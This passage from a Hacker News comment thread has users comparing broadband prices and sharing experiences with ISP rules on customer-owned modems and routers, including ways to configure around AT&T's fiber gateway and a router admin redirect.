know about NL, but in Hungary and a lot of other EU | countries you can get 100Mb/10Mb for about 10 EUR, gigabit | for 20-30. | thedance wrote: | This varies greatly by locale and is not uniform across the | USA. In Berkeley, California I have fiber service that | terminates in my own equipment, no rented equipment and no | bundled services (TV, phone, etc). It's nominally symmetric | gigabit service for $40/month. | hugofloss wrote: | For me, in NL, it's about 55 Euro per month for 200/200 fiber | and TV (including fees and taxes). Unfortunately this | increases every year in NL as well. | msla wrote: | I have Spectrum cable Internet. I use their modem, but I supply | my own router, and they've never given me any trouble. In fact, | they recently upgraded my modem (from a Scientific Atlanta | 2203C to a Ubee E31U2V1) and they didn't send me a router. The | Ubee E31U2V1, like the Scientific Atlanta 2203C before it, only | has one Ethernet port, and their official guide to getting the | new modem working involved rebooting an external router, so | there's no possible way they have a problem with customer-owned | routers. | | Which works out great for me. I can use OpenWRT with no hassle. | | More to the point, I see the cable stuff as "ISP land" in that | it's directly interfacing with their internal hardware, and so | has to dance to their tune very directly, whereas Ethernet and | TCP/IP are common, and so will obey my rules in my home. I | don't expect my modem to perform adblocking, which is why my | router does it, and I'm not going to be stupid and try to | "uncap" my modem to get more speed, so I don't see a point to | being able to provide my own cable modem. As long as I can own | the router which provides the only path in and out of my LAN, I | can do everything I'm capable of doing anyway, as far as I can | see. | pmh wrote: | > I don't see a point to being able to provide my own cable | modem | | Other cable providers (e.g. Comcast) charge you a monthly fee | (~$5-15) to rent their modem. Buying a modem gets cost | effective pretty quickly. | AmericanChopper wrote: | I use my own one because the $2 Huawei ones perform really | poorly, they're the source of a large portion of general | internet performance issues for a lot of people. | markus92 wrote: | It's been more common for DSL too, but I haven't heard of | anyone using their own DOCSIS modem for Ziggo though. Have you? | r1ch wrote: | Do you know if this applies to cable modems too? Are they | required to allow a 3rd party modem that they normally wouldn't | provide to customers? | avip wrote: | This law is a tech-support nightmare. | | You can call your ISP with _any_ arbitrary piece of non-branded | random AliExpress $#@$ of a network eq. and they must walk you | through configuring it? That does not make much sense to me. | hedora wrote: | The US has (had?) some network neutrality rules around | discriminating against different types of hardware, but AT&T | just does it anyway. (They require you to use their DSL modem + | router + wifi and it has broken support for adding a second | router behind it.) | strbean wrote: | Dealing with the same thing with AT&T fiber. There was word | of a hack involving putting your router behind a switch with | the AT&T router after cloning the MAC, then booting them both | up and letting your router pick up the DHCP responses along | with the AT&T router. Once the AT&T router had done its | proprietary handshake, you could disconnect the AT&T router. | | Unfortunately I had no luck with that - my loose theory is | that my EdgeRouter was doing a ping check to see if the IP | was already taken before accepting the DHCP lease... | | I was able to get "IP passthrough" mode working with the AT&T | router though. The key hiccup was that the AT&T router had to | be on a different subnet than my router's LAN subnet. | jonpurdy wrote: | I just moved to SF and got AT&T gigabit fiber in mid- | February. I followed this guide and got it working at | gigabit speeds (eventually): https://www.reddit.com/r/Ubiqu | iti/comments/cjw9jt/howto_bypa... | | It's been working great since I set it up; highly | recommended! | | Hardware offloading needs to be enabled and QoS disabled | for gigabit speeds (~900Mbps both ways, simultaneous | ~500Mbps both ways). | | If you send me an email (hn-202003@jonpurdy.com), I can | send you my exact configs. | thinkloop wrote: | How can you do without the modem? Which ubiquity product is | that? | hugofloss wrote: | I used the Unifi Security Gateway to replace my ISP's modem. | philg_jr wrote: | Typically, FTTH doesn't require a "modem". | | In my case, I have VZ Fios in the northeast US. Their | termination point at my house has an RJ45 Ethernet | connection. It goes directly to my pfSense router. | ksec wrote: | So they actually have an ONT somewhere and provides you | with a RJ45 Ethernet port only? | | This is brilliant! Why aren't more ISP doing it? I dont | want another ONT / Modem / piece of equipment in my flat. | cameronh90 wrote: | As far as I'm aware, UK doesn't have a law like this, but I've | never had a situation where an ISP cared, they just tell you | that if you have problems they might not be able to help. I | think you get interop issues with TV and landline with those | ISPs where everything is bundled into one fibre, but the | internet bit usually works fine. | jedimastert wrote: | I don't know if it's "law" in America but I've never seen a | major ISP give any more guff than sometimes making a technician | come out to read the modem's MAC address. I've never had a | ISP's router or modem on my networks | robotnikman wrote: | Same. From my experience you can use a modem of your choice, | you just need to provide your MAC address to your ISP and its | good to go. | PascLeRasc wrote: | Slightly off-topic: I'd really like to run screenfetch on my | router (Asus RT-N66U), but it doesn't have enough free space to | sftp the script to it [1]. Piping the script just freezes up. | Does anyone know a good workaround? Has anyone ever tried this? | | [1] https://unix.stackexchange.com/questions/510947/how-can-i- | ru... | Topgamer7 wrote: | Check if your router has tmpfs mounted. Iirc thats ram, it | should probably have enough space for you to upload it and run | it from there. | k__ wrote: | The only router with good admin interface I ever had was one with | open source software. | | Every other router, for 20 years now, had a slow and buggy web | interface. | | Why is this?! | skizm wrote: | My ISP has a cloud access "feature". If I go to 192.168.1.1 it | redirects me to their "router.MYISP.net" site. What's the best | way to go about disabling this? Should I just dump the rented | router for my own? | simplyinfinity wrote: | asus (and others) have the same feature. In my case it's a | simple redirect from the ip of 192.168.1.1 to router.myasus.com | which has a dns record of 192.168.1.1. so all it does is do a | redirect to a domain. ___________________________________________________________________ (page generated 2020-03-26 23:00 UTC)